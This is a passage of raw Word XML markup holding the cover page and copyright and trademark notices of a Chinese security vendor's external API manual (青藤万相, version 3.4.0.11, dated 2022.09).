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A44BB" w14:textId="6C6BE159" w:rsidR="00824F5A" w:rsidRPr="000449B2" w:rsidRDefault="00FA611F" w:rsidP="00824F5A">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:keepNext/>
        <w:rPr>
          <w:rFonts w:ascii="阿里巴巴普惠体 2.0 55 Regular" w:eastAsia="阿里巴巴普惠体 2.0 55 Regular" w:hAnsi="阿里巴巴普惠体 2.0 55 Regular" w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="536A81B1" wp14:editId="121BA8E5">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-591711</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-813216</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7596000" cy="10743460"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3"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形 3"/>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596000" cy="10743460"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="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81"/>
        <w:gridCol w:w="295"/>
      </w:tblGrid>
      <w:tr w:rsidR="005556E8" w:rsidRPr="000449B2" w14:paraId="60EB42FF" w14:textId="77777777" w:rsidTr="00FA611F">
        <w:trPr>
          <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
          <w:trHeight w:val="1037"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9781" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F0D262F" w14:textId="0D14BB32" w:rsidR="005556E8" w:rsidRPr="000449B2" w:rsidRDefault="005556E8" w:rsidP="00824F5A">
            <w:pPr>
              <w:ind w:right="112"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="295" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="267E9372" w14:textId="77777777" w:rsidR="005556E8" w:rsidRPr="000449B2" w:rsidRDefault="005556E8" w:rsidP="00824F5A">
            <w:pPr>
              <w:ind w:right="112"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00824F5A" w:rsidRPr="000449B2" w14:paraId="68DEBD05" w14:textId="1B33E9DB" w:rsidTr="00FA611F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9781" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EE095C6" w14:textId="7C36111D" w:rsidR="00824F5A" w:rsidRPr="000449B2" w:rsidRDefault="00824F5A" w:rsidP="00824F5A">
            <w:pPr>
              <w:ind w:right="112"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="295" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="319F3C78" w14:textId="77777777" w:rsidR="00824F5A" w:rsidRPr="000449B2" w:rsidRDefault="00824F5A" w:rsidP="00824F5A">
            <w:pPr>
              <w:ind w:right="112"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00824F5A" w:rsidRPr="000449B2" w14:paraId="4370C814" w14:textId="44DF8D21" w:rsidTr="00964B15">
        <w:trPr>
          <w:trHeight w:val="1890"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9781" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44065ED4" w14:textId="025AB203" w:rsidR="00824F5A" w:rsidRPr="000449B2" w:rsidRDefault="00824F5A" w:rsidP="00824F5A">
            <w:pPr>
              <w:ind w:right="112"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="295" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F35F40B" w14:textId="77777777" w:rsidR="00824F5A" w:rsidRPr="000449B2" w:rsidRDefault="00824F5A" w:rsidP="007A7107">
            <w:pPr>
              <w:ind w:right="112"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00824F5A" w:rsidRPr="000449B2" w14:paraId="36ED951F" w14:textId="63E027A8" w:rsidTr="00964B15">
        <w:trPr>
          <w:trHeight w:val="1137"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9781" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58B871AB" w14:textId="15653E9B" w:rsidR="00824F5A" w:rsidRPr="000449B2" w:rsidRDefault="00824F5A" w:rsidP="003614D1">
            <w:pPr>
              <w:ind w:right="112"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
                <w:color w:val="00A4C5"/>
                <w:sz w:val="72"/>
                <w:szCs w:val="72"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
                <w:color w:val="00A4C5"/>
                <w:sz w:val="72"/>
                <w:szCs w:val="72"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> DOCPROPERTY  产品名称  \* MERGEFORMAT </w:instrText>
            </w:r>
            <w:r w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
                <w:color w:val="00A4C5"/>
                <w:sz w:val="72"/>
                <w:szCs w:val="72"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
                <w:color w:val="00A4C5"/>
                <w:sz w:val="72"/>
                <w:szCs w:val="72"/>
              </w:rPr>
              <w:t>青藤万相</w:t>
            </w:r>
            <w:r w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
                <w:color w:val="00A4C5"/>
                <w:sz w:val="72"/>
                <w:szCs w:val="72"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="295" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="295E33D2" w14:textId="77777777" w:rsidR="00824F5A" w:rsidRPr="000449B2" w:rsidRDefault="00824F5A" w:rsidP="00824F5A">
            <w:pPr>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:color w:val="00A4C5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003614D1" w:rsidRPr="00964B15" w14:paraId="2A1C8BF7" w14:textId="77777777" w:rsidTr="00964B15">
        <w:trPr>
          <w:trHeight w:val="1147"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9781" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C317519" w14:textId="18CAFD38" w:rsidR="003614D1" w:rsidRPr="00964B15" w:rsidRDefault="003614D1" w:rsidP="009807A8">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="atLeast"/>
              <w:ind w:right="113"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
                <w:color w:val="00A4C5"/>
                <w:sz w:val="84"/>
                <w:szCs w:val="84"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00964B15">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
                <w:sz w:val="84"/>
                <w:szCs w:val="84"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="00964B15">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
                <w:sz w:val="84"/>
                <w:szCs w:val="84"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> DOCPROPERTY  手册名称  \* MERGEFORMAT </w:instrText>
            </w:r>
            <w:r w:rsidRPr="00964B15">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
                <w:sz w:val="84"/>
                <w:szCs w:val="84"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
                <w:sz w:val="84"/>
                <w:szCs w:val="84"/>
              </w:rPr>
              <w:t>外部API手册</w:t>
            </w:r>
            <w:r w:rsidRPr="00964B15">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
                <w:sz w:val="84"/>
                <w:szCs w:val="84"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="295" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40662815" w14:textId="77777777" w:rsidR="003614D1" w:rsidRPr="00964B15" w:rsidRDefault="003614D1" w:rsidP="00824F5A">
            <w:pPr>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:color w:val="00A4C5"/>
                <w:sz w:val="84"/>
                <w:szCs w:val="84"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003614D1" w:rsidRPr="000449B2" w14:paraId="79253267" w14:textId="77777777" w:rsidTr="00FA611F">
        <w:trPr>
          <w:trHeight w:val="986"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9781" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CEBC14B" w14:textId="2B88BD08" w:rsidR="003614D1" w:rsidRPr="000449B2" w:rsidRDefault="003614D1" w:rsidP="00824F5A">
            <w:pPr>
              <w:ind w:right="112"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
                <w:color w:val="00A4C5"/>
                <w:sz w:val="72"/>
                <w:szCs w:val="72"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> DOCPROPERTY  版本号  \* MERGEFORMAT </w:instrText>
            </w:r>
            <w:r w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t>v3.4.0.11</w:t>
            </w:r>
            <w:r w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="295" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B633CEE" w14:textId="77777777" w:rsidR="003614D1" w:rsidRPr="000449B2" w:rsidRDefault="003614D1" w:rsidP="00824F5A">
            <w:pPr>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:color w:val="00A4C5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E2545" w:rsidRPr="000449B2" w14:paraId="379240C0" w14:textId="77777777" w:rsidTr="00964B15">
        <w:trPr>
          <w:trHeight w:val="5126"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9781" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7ABD357B" w14:textId="4B60409F" w:rsidR="009E2545" w:rsidRPr="000449B2" w:rsidRDefault="009E2545" w:rsidP="00824F5A">
            <w:pPr>
              <w:ind w:right="112"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="295" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47B9A240" w14:textId="77777777" w:rsidR="009E2545" w:rsidRPr="000449B2" w:rsidRDefault="009E2545" w:rsidP="00824F5A">
            <w:pPr>
              <w:spacing w:line="60" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:caps/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00824F5A" w:rsidRPr="000449B2" w14:paraId="2CAB2E53" w14:textId="2087923B" w:rsidTr="00FA611F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9781" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49A289AA" w14:textId="7CA60B65" w:rsidR="00824F5A" w:rsidRPr="000449B2" w:rsidRDefault="002D42B1" w:rsidP="00824F5A">
            <w:pPr>
              <w:ind w:right="112"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D42B1">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular" w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>让主机稳定又安全</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FA15E4B" w14:textId="259BA3FB" w:rsidR="00824F5A" w:rsidRPr="000449B2" w:rsidRDefault="00824F5A" w:rsidP="009E2545">
            <w:pPr>
              <w:ind w:right="112"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> DOCPROPERTY  日期  \* MERGEFORMAT </w:instrText>
            </w:r>
            <w:r w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2022.09</w:t>
            </w:r>
            <w:r w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="295" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C019E5B" w14:textId="77777777" w:rsidR="00824F5A" w:rsidRPr="000449B2" w:rsidRDefault="00824F5A" w:rsidP="00824F5A">
            <w:pPr>
              <w:spacing w:line="60" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:caps/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5FEC09A4" w14:textId="3DBE09FC" w:rsidR="007955E6" w:rsidRPr="000449B2" w:rsidRDefault="007955E6" w:rsidP="005556E8">
      <w:pPr>
        <w:ind w:right="112"/>
        <w:rPr>
          <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79D56D66" w14:textId="55237CC8" w:rsidR="00FB10C9" w:rsidRPr="000449B2" w:rsidRDefault="00FB10C9" w:rsidP="00FB10C9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
        </w:rPr>
        <w:sectPr w:rsidR="00FB10C9" w:rsidRPr="000449B2" w:rsidSect="004F7A51">
          <w:headerReference w:type="even" r:id="rId10"/>
          <w:headerReference w:type="default" r:id="rId11"/>
          <w:footerReference w:type="even" r:id="rId12"/>
          <w:headerReference w:type="first" r:id="rId13"/>
          <w:footerReference w:type="first" r:id="rId14"/>
          <w:pgSz w:w="11900" w:h="16840"/>
          <w:pgMar w:top="907" w:right="907" w:bottom="907" w:left="907" w:header="851" w:footer="992" w:gutter="0"/>
          <w:cols w:space="425"/>
          <w:docGrid w:type="lines" w:linePitch="423"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="10065" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10065"/>
      </w:tblGrid>
      <w:tr w:rsidR="007955E6" w:rsidRPr="000449B2" w14:paraId="0BBB391D" w14:textId="77777777" w:rsidTr="009A7E12">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10065" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51FDABF8" w14:textId="77777777" w:rsidR="007955E6" w:rsidRPr="000449B2" w:rsidRDefault="007955E6" w:rsidP="00A01BE9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular" w:hint="eastAsia"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>■ 版权声明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007955E6" w:rsidRPr="000449B2" w14:paraId="7148DD29" w14:textId="77777777" w:rsidTr="009A7E12">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10065" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="288AD638" w14:textId="77777777" w:rsidR="007955E6" w:rsidRPr="000449B2" w:rsidRDefault="007955E6" w:rsidP="00A01BE9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>本文中出现的任何文字叙述、文档格式、插图、照片、方法、过程等内容，除另有特别注明，版权均属</w:t>
            </w:r>
            <w:r w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular" w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>青藤</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:b/>
              </w:rPr>
              <w:t>云安全</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所有，受到有关产权及版权法保护。任何个人、机构未经</w:t>
            </w:r>
            <w:r w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular" w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>青藤</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:b/>
              </w:rPr>
              <w:t>云安全</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的书面授权许可，不得以任何方式复制或引用本文的任何片断。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004A5D6D" w:rsidRPr="000449B2" w14:paraId="1DCE29BB" w14:textId="77777777" w:rsidTr="009A7E12">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10065" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F990E81" w14:textId="61E994CA" w:rsidR="004A5D6D" w:rsidRPr="000449B2" w:rsidRDefault="004A5D6D" w:rsidP="00A01BE9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>■ 商标声明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004A5D6D" w:rsidRPr="000449B2" w14:paraId="38C87990" w14:textId="77777777" w:rsidTr="009A7E12">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10065" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0923ADA0" w14:textId="5BE29EBD" w:rsidR="004A5D6D" w:rsidRPr="000449B2" w:rsidRDefault="00090665" w:rsidP="00E80B22">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular" w:hint="eastAsia"/>
                <w:noProof/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FF0AF46" wp14:editId="6E3C1734">
                  <wp:extent cx="648000" cy="162367"/>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8000" cy="162367"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:r w:rsidR="00A01BE9" w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>和其他</w:t>
            </w:r>
            <w:r w:rsidR="00A01BE9" w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular" w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>青藤</w:t>
            </w:r>
            <w:r w:rsidR="00A01BE9" w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>商标均为</w:t>
            </w:r>
            <w:r w:rsidR="00A01BE9" w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular" w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>青藤</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00A01BE9" w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:b/>
              </w:rPr>
              <w:t>云安全</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00A01BE9" w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>的商标。本文档提及的其他所有商标或注册商标，由各自的所有人拥有。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009807A8" w:rsidRPr="000449B2" w14:paraId="2F9194F4" w14:textId="77777777" w:rsidTr="009807A8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10065" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2ECDFDE2" w14:textId="77777777" w:rsidR="009807A8" w:rsidRPr="000449B2" w:rsidRDefault="009807A8" w:rsidP="00AE5EA2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000449B2">
              <w:rPr>
